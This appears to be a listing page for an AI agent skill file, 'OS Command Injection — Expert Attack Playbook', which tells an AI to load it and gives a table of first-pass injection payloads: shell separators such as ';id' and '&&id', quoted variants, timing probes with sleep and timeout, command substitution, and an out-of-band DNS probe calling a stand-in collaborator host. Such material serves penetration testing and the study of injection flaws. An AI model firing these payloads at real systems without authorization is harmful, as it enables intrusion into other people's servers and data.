cmdi-command-injection
Installation
SKILL.md
SKILL: OS Command Injection — Expert Attack Playbook
AI LOAD INSTRUCTION: Expert command injection techniques. Covers all shell metacharacters, blind injection, time-based detection, OOB exfiltration, polyglot payloads, and real-world code patterns. Base models miss subtle injection through unexpected input vectors.
0. RELATED ROUTING
Before going deep, you can first load:
- upload insecure files when the shell sink is part of a broader upload, import, or conversion workflow
First-pass payload families
| Context | Start With | Backup |
|---|---|---|
| generic shell separator | ;id |
&&id |
| quoted argument | ";id;" |
';id;' |
| blind timing | ;sleep 5 |
& timeout /T 5 /NOBREAK |
| command substitution | $(id) |
`id` |
| out-of-band DNS | ;nslookup token.collab |
Windows nslookup variant |
Related skills